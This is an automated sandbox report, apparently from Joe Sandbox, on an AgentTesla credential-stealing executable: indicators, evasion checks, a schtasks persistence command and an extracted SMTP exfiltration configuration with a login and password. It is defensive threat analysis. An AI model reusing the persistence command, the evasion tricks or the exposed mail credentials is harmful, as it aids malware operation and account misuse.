Analysis Report 4019223246.exe

Overview

General Information

Sample Name: 4019223246.exe
Analysis ID: 358326
MD5: 87e6882bcebf4823afb4303aac3628b1
SHA1: fa6df79dd667fcbb97c6ffbf947ee356512b292d
SHA256: 369d92b64ee7b40f1679b98499e6d2b3470f9d477a8c35256508ae5715516194
Tags: exe

Detection

AgentTesla
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Sigma detected: Scheduled temp file as task from temp location
Yara detected AgentTesla
Yara detected AntiVM_3
Found evasive API chain (trying to detect sleep duration tampering with parallel thread)
Machine Learning detection for dropped file
Machine Learning detection for sample
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file access)
Uses schtasks.exe or at.exe to add and modify task schedules
Contains capabilities to detect virtual machines
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query locales information (e.g. system language)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses SMTP (mail sending)
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Startup

  • System is w10x64
  • 4019223246.exe (PID: 7056 cmdline: 'C:\Users\user\Desktop\4019223246.exe' MD5: 87E6882BCEBF4823AFB4303AAC3628B1)
    • schtasks.exe (PID: 5708 cmdline: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\WZXjvtGBEKK' /XML 'C:\Users\user\AppData\Local\Temp\tmp35E.tmp' MD5: 15FF7D8324231381BAD48A052F85DF04)
      • conhost.exe (PID: 3436 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • 4019223246.exe (PID: 6104 cmdline: C:\Users\user\Desktop\4019223246.exe MD5: 87E6882BCEBF4823AFB4303AAC3628B1)
  • cleanup

Malware Configuration

Threatname: Agenttesla

{"Exfil Mode": "SMTP", "FTP Info": "systems@krenterprisesindia.comparida@1971@us2.smtp.mailhostbox.com"}

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000004.00000002.913312856.0000000002ED4000.00000004.00000001.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security |
00000001.00000002.658750521.0000000002C95000.00000004.00000001.sdmp | JoeSecurity_AntiVM_3 | Yara detected AntiVM_3 | Joe Security |
00000004.00000002.914172803.0000000003E21000.00000004.00000001.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security |
00000004.00000002.914560852.0000000004FE0000.00000004.00000001.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security |
00000004.00000002.913196902.0000000002E21000.00000004.00000001.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security |

Unpacked PEs

Source | Rule | Description | Author | Strings
4.2.4019223246.exe.25e301e.4.unpack | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security |
4.2.4019223246.exe.3e23258.8.raw.unpack | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security |
4.2.4019223246.exe.3e24140.10.unpack | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security |
4.2.4019223246.exe.25e2136.5.unpack | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security |
4.3.4019223246.exe.be4648.0.raw.unpack | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security |

Sigma Overview

System Summary:

Sigma detected: Scheduled temp file as task from temp location
Source: Process started | Author: Joe Security | Data: Command: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\WZXjvtGBEKK' /XML 'C:\Users\user\AppData\Local\Temp\tmp35E.tmp', CommandLine: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\WZXjvtGBEKK' /XML 'C:\Users\user\AppData\Local\Temp\tmp35E.tmp', CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: 'C:\Users\user\Desktop\4019223246.exe' , ParentImage: C:\Users\user\Desktop\4019223246.exe, ParentProcessId: 7056, ProcessCommandLine: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\WZXjvtGBEKK' /XML 'C:\Users\user\AppData\Local\Temp\tmp35E.tmp', ProcessId: 5708

Signature Overview

AV Detection:

Found malware configuration
Source: 4.2.4019223246.exe.29f0ee8.6.raw.unpack | Malware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "FTP Info": "systems@krenterprisesindia.comparida@1971@us2.smtp.mailhostbox.com"}
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Roaming\WZXjvtGBEKK.exe | Joe Sandbox ML: detected
Machine Learning detection for sample
Source: 4019223246.exe | Joe Sandbox ML: detected

Compliance:

Uses 32bit PE files
Source: 4019223246.exe | Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Uses new MSVCR Dlls
Source: C:\Users\user\Desktop\4019223246.exe | File opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9445_none_d08c58b4442ba54f\MSVCR80.dll
Contains modern PE file flags such as dynamic base (ASLR) or NX
Source: 4019223246.exe | Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Binary contains paths to debug symbols
Source: Binary string: _.pdb source: 4019223246.exe, 00000004.00000003.657876207.0000000000C2F000.00000004.00000001.sdmp
Source: global traffic | TCP traffic: 192.168.2.4:49767 -> 208.91.198.143:587
Source: global traffic | TCP traffic: 192.168.2.4:49769 -> 208.91.199.224:587
Source: Joe Sandbox View | IP Address: 208.91.198.143 208.91.198.143
Source: Joe Sandbox View | IP Address: 208.91.199.224 208.91.199.224
Source: C:\Users\user\Desktop\4019223246.exe | Code function: 4_2_026BB0B2 recv,4_2_026BB0B2
Source: unknown | DNS traffic detected: queries for: us2.smtp.mailhostbox.com
Source: 4019223246.exe, 00000004.00000002.913196902.0000000002E21000.00000004.00000001.sdmp | String found in binary or memory: http://127.0.0.1:HTTP/1.1
Source: 4019223246.exe, 00000004.00000002.913196902.0000000002E21000.00000004.00000001.sdmp | String found in binary or memory: http://DynDns.comDynDNS
Source: 4019223246.exe, 00000004.00000002.913196902.0000000002E21000.00000004.00000001.sdmp | String found in binary or memory: http://qpQMsG.com
Source: 4019223246.exe, 00000001.00000002.658704693.0000000002C41000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: 4019223246.exe, 00000004.00000002.913312856.0000000002ED4000.00000004.00000001.sdmp | String found in binary or memory: http://wg3NmRd1lkGGL4Op.org
Source: 4019223246.exe, 00000004.00000002.913312856.0000000002ED4000.00000004.00000001.sdmp | String found in binary or memory: http://wg3NmRd1lkGGL4Op.orghb
Source: 4019223246.exe, 00000001.00000002.658750521.0000000002C95000.00000004.00000001.sdmp | String found in binary or memory: https://stackpath.bootstrapcdn.com/bootstrap/4.5.0/css/bootstrap.min.css
Source: 4019223246.exe, 00000004.00000002.913196902.0000000002E21000.00000004.00000001.sdmp | String found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha
Source: C:\Users\user\Desktop\4019223246.exe | Window created: window name: CLIPBRDWNDCLASS

System Summary:

Source: C:\Users\user\Desktop\4019223246.exe | Code function: 4_2_026BB9BA NtQuerySystemInformation,4_2_026BB9BA
Source: C:\Users\user\Desktop\4019223246.exe | Code function: 4_2_026BB9A8 NtQuerySystemInformation,4_2_026BB9A8
Source: C:\Users\user\Desktop\4019223246.exe | File created: C:\Windows\assembly\Desktop.ini
Source: C:\Users\user\Desktop\4019223246.exe | Code function: String function: 0040E198 appears 42 times
Source: 4019223246.exe, 00000001.00000002.658750521.0000000002C95000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenameAsyncState.dllF vs 4019223246.exe
Source: 4019223246.exe, 00000001.00000002.662251646.0000000005EF6000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenameObjectIDGenerator.exe< vs 4019223246.exe
Source: 4019223246.exe, 00000001.00000002.661981197.0000000005E70000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenameLegacyPathHandling.dllN vs 4019223246.exe
Source: 4019223246.exe, 00000001.00000002.662685824.0000000006720000.00000002.00000001.sdmp | Binary or memory string: originalfilename vs 4019223246.exe
Source: 4019223246.exe, 00000001.00000002.662685824.0000000006720000.00000002.00000001.sdmp | Binary or memory string: OriginalFilenamepropsys.dll.mui@ vs 4019223246.exe
Source: 4019223246.exe, 00000001.00000002.662459335.0000000006620000.00000002.00000001.sdmp | Binary or memory string: System.OriginalFileName vs 4019223246.exe
Source: 4019223246.exe, 00000004.00000003.657876207.0000000000C2F000.00000004.00000001.sdmp | Binary or memory string: OriginalFilename_.dll4 vs 4019223246.exe
Source: 4019223246.exe, 00000004.00000000.656009800.000000000054E000.00000002.00020000.sdmp | Binary or memory string: OriginalFilenameObjectIDGenerator.exe< vs 4019223246.exe
Source: 4019223246.exe, 00000004.00000002.914172803.0000000003E21000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenameVYolEChnIaesWIMZgVfbCHvjTeMwVa.exe4 vs 4019223246.exe
Source: 4019223246.exe, 00000004.00000002.914766360.00000000051B0000.00000002.00000001.sdmp | Binary or memory string: OriginalFilenameKernelbase.dll.muij% vs 4019223246.exe
Source: 4019223246.exe | Binary or memory string: OriginalFilenameObjectIDGenerator.exe< vs 4019223246.exe
Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@6/6@2/2
Source: C:\Users\user\Desktop\4019223246.exe | Code function: 4_2_026BA9DA AdjustTokenPrivileges,4_2_026BA9DA
Source: C:\Users\user\Desktop\4019223246.exe | Code function: 4_2_026BA9A3 AdjustTokenPrivileges,4_2_026BA9A3
Source: C:\Users\user\Desktop\4019223246.exe | Code function: 4_2_00401980 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,FindCloseChangeNotification,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,CorBindToRuntimeEx,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,InterlockedDecrement,InterlockedDecrement,SysFreeString,VariantClear,InterlockedDecrement,SysFreeString,4_2_00401980
Source: C:\Users\user\Desktop\4019223246.exe | File created: C:\Users\user\AppData\Roaming\WZXjvtGBEKK.exe
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3436:120:WilError_01
Source: C:\Users\user\Desktop\4019223246.exe | Mutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
Source: C:\Users\user\Desktop\4019223246.exe | File created: C:\Users\user\AppData\Local\Temp\tmp35E.tmp
Source: 4019223246.exe | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\4019223246.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Users\user\Desktop\4019223246.exe | Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9603718106bd57ecfbb18fefd769cab4\mscorlib.ni.dll
Source: C:\Users\user\Desktop\4019223246.exe | Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
Source: C:\Users\user\Desktop\4019223246.exe | Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
Source: C:\Users\user\Desktop\4019223246.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\Desktop\4019223246.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\4019223246.exe | File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\Desktop\4019223246.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Users\user\Desktop\4019223246.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: 4019223246.exe, 00000001.00000002.658750521.0000000002C95000.00000004.00000001.sdmp | Binary or memory string: INSERT INTO Itens_Aluguel VALUES(@aluguelID, @aviaoID, @validade);
Source: 4019223246.exe, 00000001.00000002.658750521.0000000002C95000.00000004.00000001.sdmp | Binary or memory string: Insert into Clientes values (@nome, @cpf, @rg, @cidade, @endereco, @uf, @telefone);
Source: C:\Users\user\Desktop\4019223246.exe | File read: C:\Users\user\Desktop\4019223246.exe
Source: unknown | Process created: C:\Users\user\Desktop\4019223246.exe 'C:\Users\user\Desktop\4019223246.exe'
Source: unknown | Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\WZXjvtGBEKK' /XML 'C:\Users\user\AppData\Local\Temp\tmp35E.tmp'
Source: unknown | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Users\user\Desktop\4019223246.exe C:\Users\user\Desktop\4019223246.exe
Source: C:\Users\user\Desktop\4019223246.exe | Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\WZXjvtGBEKK' /XML 'C:\Users\user\AppData\Local\Temp\tmp35E.tmp'
Source: C:\Users\user\Desktop\4019223246.exe | Process created: C:\Users\user\Desktop\4019223246.exe C:\Users\user\Desktop\4019223246.exe
Source: C:\Users\user\Desktop\4019223246.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32
Source: C:\Users\user\Desktop\4019223246.exe | File written: C:\Windows\assembly\Desktop.ini
Source: C:\Users\user\Desktop\4019223246.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Source: C:\Users\user\Desktop\4019223246.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: 4019223246.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: C:\Users\user\Desktop\4019223246.exe | Code function: 1_2_00858D0C push es; iretd 1_2_00858F8B
Source: C:\Users\user\Desktop\4019223246.exe | Code function: 4_2_0041C40C push cs; iretd 4_2_0041C4E2
Source: C:\Users\user\Desktop\4019223246.exe | Code function: 4_2_00423149 push eax; ret 4_2_00423179
Source: C:\Users\user\Desktop\4019223246.exe | Code function: 4_2_0041C50E push cs; iretd 4_2_0041C4E2
Source: C:\Users\user\Desktop\4019223246.exe | Code function: 4_2_004231C8 push eax; ret 4_2_00423179
Source: C:\Users\user\Desktop\4019223246.exe | Code function: 4_2_0040E1DD push ecx; ret 4_2_0040E1F0
Source: C:\Users\user\Desktop\4019223246.exe | Code function: 4_2_004211B8 push ebx; retf 4_2_004211B9
Source: C:\Users\user\Desktop\4019223246.exe | Code function: 4_2_0041C6BE push ebx; ret 4_2_0041C6BF
Source: C:\Users\user\Desktop\4019223246.exe | Code function: 4_2_00468D0C push es; iretd 4_2_00468F8B
Source: C:\Users\user\Desktop\4019223246.exe | Code function: 4_2_026C9974 push ebp; iretd 4_2_026C9975
Source: C:\Users\user\Desktop\4019223246.exe | Code function: 4_2_026C2C60 push edi; ret 4_2_026C2C76
Source: initial sample | Static PE information: section name: .text entropy: 7.13411382713
Source: C:\Users\user\Desktop\4019223246.exe | File created: C:\Users\user\AppData\Roaming\WZXjvtGBEKK.exe

Boot Survival:

Uses schtasks.exe or at.exe to add and modify task schedules
Source: unknown | Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\WZXjvtGBEKK' /XML 'C:\Users\user\AppData\Local\Temp\tmp35E.tmp'
Source: C:\Users\user\Desktop\4019223246.exe | Registry key monitored for changes: HKEY_CURRENT_USER_Classes
Source: C:\Users\user\Desktop\4019223246.exe | Process information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\4019223246.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\4019223246.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\4019223246.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\4019223246.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\4019223246.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\4019223246.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\4019223246.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\4019223246.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\4019223246.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\4019223246.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\4019223246.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\4019223246.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\4019223246.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\4019223246.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\4019223246.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\4019223246.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\4019223246.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\4019223246.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\4019223246.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\4019223246.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\4019223246.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\4019223246.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\4019223246.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\4019223246.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\4019223246.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\4019223246.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\4019223246.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\4019223246.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\4019223246.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\4019223246.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\4019223246.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\4019223246.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\4019223246.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\4019223246.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\4019223246.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\4019223246.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\4019223246.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                      Malware Analysis System Evasion:

                      Yara detected AntiVM_3
                      Source: Yara match File source: 00000001.00000002.658750521.0000000002C95000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara match File source: 00000001.00000002.658704693.0000000002C41000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara match File source: Process Memory Space: 4019223246.exe PID: 7056, type: MEMORY
                      Source: Yara match File source: 1.2.4019223246.exe.2c70544.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 1.2.4019223246.exe.2ca93cc.2.raw.unpack, type: UNPACKEDPE
                      Found evasive API chain (trying to detect sleep duration tampering with parallel thread)
                      Source: C:\Users\user\Desktop\4019223246.exe Function Chain: systemQueried,threadCreated,threadResumed,threadDelayed,threadDelayed,threadDelayed,systemQueried,systemQueried,systemQueried,threadDelayed,systemQueried,threadDelayed,threadDelayed,systemQueried,threadDelayed,systemQueried,threadDelayed,threadDelayed,processSet,processSet,memAlloc,memAlloc,memAlloc,memAlloc,threadDelayed
                      Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
                      Source: C:\Users\user\Desktop\4019223246.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                      Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
                      Source: C:\Users\user\Desktop\4019223246.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                      Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
                      Source: 4019223246.exe, 00000001.00000002.658750521.0000000002C95000.00000004.00000001.sdmp Binary or memory string: SBIEDLL.DLL
                      Source: 4019223246.exe, 00000001.00000002.658750521.0000000002C95000.00000004.00000001.sdmp Binary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME
                      Source: C:\Users\user\Desktop\4019223246.exe File opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                      Source: C:\Users\user\Desktop\4019223246.exe Code function: 4_2_00401980 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,FindCloseChangeNotification,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,CorBindToRuntimeEx,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,InterlockedDecrement,InterlockedDecrement,SysFreeString,VariantClear,InterlockedDecrement,SysFreeString,4_2_00401980
                      Source: C:\Users\user\Desktop\4019223246.exe Thread delayed: delay time: 922337203685477
                      Source: C:\Users\user\Desktop\4019223246.exe Window / User API: threadDelayed 619
                      Source: C:\Users\user\Desktop\4019223246.exe TID: 7060 Thread sleep time: -102727s >= -30000s
                      Source: C:\Users\user\Desktop\4019223246.exe TID: 7096 Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Users\user\Desktop\4019223246.exe TID: 3524 Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Users\user\Desktop\4019223246.exe TID: 3524 Thread sleep count: 619 > 30
                      Source: C:\Users\user\Desktop\4019223246.exe TID: 3524 Thread sleep time: -18570000s >= -30000s
                      Source: C:\Users\user\Desktop\4019223246.exe TID: 3524 Thread sleep time: -60000s >= -30000s
                      Source: C:\Users\user\Desktop\4019223246.exe TID: 3524 Thread sleep time: -30000s >= -30000s
                      Source: C:\Users\user\Desktop\4019223246.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\Desktop\4019223246.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
                      Source: C:\Users\user\Desktop\4019223246.exe Last function: Thread delayed
                      Source: 4019223246.exe, 00000001.00000002.658750521.0000000002C95000.00000004.00000001.sdmp Binary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
                      Source: 4019223246.exe, 00000004.00000002.914766360.00000000051B0000.00000002.00000001.sdmp Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
                      Source: 4019223246.exe, 00000001.00000002.658750521.0000000002C95000.00000004.00000001.sdmp Binary or memory string: vmware
                      Source: 4019223246.exe, 00000004.00000002.912265760.0000000000C57000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAW
                      Source: 4019223246.exe, 00000004.00000002.914766360.00000000051B0000.00000002.00000001.sdmp Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
                      Source: 4019223246.exe, 00000004.00000002.914766360.00000000051B0000.00000002.00000001.sdmp Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
                      Source: 4019223246.exe, 00000001.00000002.658750521.0000000002C95000.00000004.00000001.sdmp Binary or memory string: VMware SVGA II
                      Source: 4019223246.exe, 00000001.00000002.658750521.0000000002C95000.00000004.00000001.sdmp Binary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools
                      Source: 4019223246.exe, 00000004.00000002.914766360.00000000051B0000.00000002.00000001.sdmp Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
                      Source: C:\Users\user\Desktop\4019223246.exe Process information queried: ProcessInformation
                      Source: C:\Users\user\Desktop\4019223246.exe Code function: 4_2_0040CDC9 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,4_2_0040CDC9
                      Source: C:\Users\user\Desktop\4019223246.exe Code function: 4_2_0040AD70 GetProcessHeap,HeapFree,4_2_0040AD70
                      Source: C:\Users\user\Desktop\4019223246.exe Process token adjusted: Debug
                      Source: C:\Users\user\Desktop\4019223246.exe Code function: 4_2_0040E5DC _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,4_2_0040E5DC
                      Source: C:\Users\user\Desktop\4019223246.exe Code function: 4_2_00416F2A __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_00416F2A
                      Source: C:\Users\user\Desktop\4019223246.exe Code function: 4_2_004123B1 SetUnhandledExceptionFilter,4_2_004123B1
                      Source: C:\Users\user\Desktop\4019223246.exe Memory allocated: page read and write | page guard
                      Source: C:\Users\user\Desktop\4019223246.exe Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\WZXjvtGBEKK' /XML 'C:\Users\user\AppData\Local\Temp\tmp35E.tmp'
                      Source: C:\Users\user\Desktop\4019223246.exe Process created: C:\Users\user\Desktop\4019223246.exe C:\Users\user\Desktop\4019223246.exe
                      Source: 4019223246.exe, 00000004.00000002.912349471.0000000001170000.00000002.00000001.sdmp Binary or memory string: Program Manager
                      Source: 4019223246.exe, 00000004.00000002.912349471.0000000001170000.00000002.00000001.sdmp Binary or memory string: Shell_TrayWnd
                      Source: 4019223246.exe, 00000004.00000002.912349471.0000000001170000.00000002.00000001.sdmp Binary or memory string: Progman
                      Source: 4019223246.exe, 00000004.00000002.912349471.0000000001170000.00000002.00000001.sdmp Binary or memory string: Progmanlock
                      Source: C:\Users\user\Desktop\4019223246.exe Code function: GetLocaleInfoA,4_2_004179E0
                      Source: C:\Users\user\Desktop\4019223246.exe Queries volume information: C:\Users\user\Desktop\4019223246.exe VolumeInformation
                      Source: C:\Users\user\Desktop\4019223246.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                      Source: C:\Users\user\Desktop\4019223246.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
